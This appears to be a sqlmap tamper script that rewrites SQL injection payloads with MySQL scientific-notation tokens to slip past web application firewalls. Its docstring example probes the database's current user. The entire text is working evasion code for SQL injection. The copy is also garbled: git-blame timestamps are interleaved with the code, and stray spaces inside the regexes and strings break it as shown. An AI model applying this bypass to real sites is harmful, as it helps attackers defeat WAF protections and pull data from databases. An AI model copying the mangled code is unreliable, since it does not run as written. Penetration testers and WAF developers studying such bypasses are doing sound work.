2022-10-21 20:07:20 +03:00
#!/usr/bin/env python
"""
2024-01-04 01:11:52 +03:00
Copyright ( c ) 2006 - 2024 sqlmap developers ( https : / / sqlmap . org / )
2022-10-21 20:07:20 +03:00
See the file ' LICENSE ' for copying permission
"""
import re
from lib . core . enums import PRIORITY
__priority__ = PRIORITY . HIGHEST
def dependencies ( ) :
pass
def tamper ( payload , * * kwargs ) :
"""
Abuses MySQL scientific notation
Requirement :
* MySQL
Notes :
* Reference : https : / / www . gosecure . net / blog / 2021 / 10 / 19 / a - scientific - notation - bug - in - mysql - left - aws - waf - clients - vulnerable - to - sql - injection /
>> > tamper ( ' 1 AND ORD(MID((CURRENT_USER()),7,1))>1 ' )
' 1 AND ORD 1.e(MID((CURRENT_USER 1.e( 1.e) 1.e) 1.e,7 1.e,1 1.e) 1.e)>1 '
"""
if payload :
payload = re . sub ( r " [),.*^/|&] " , r " 1.e \ g<0> " , payload )
payload = re . sub ( r " ( \ w+) \ ( " , lambda match : " %s 1.e( " % match . group ( 1 ) if not re . search ( r " (?i) \ A(MID|CAST|FROM|COUNT) \ Z " , match . group ( 1 ) ) else match . group ( 0 ) , payload ) # NOTE: MID and CAST don't work for sure
return payload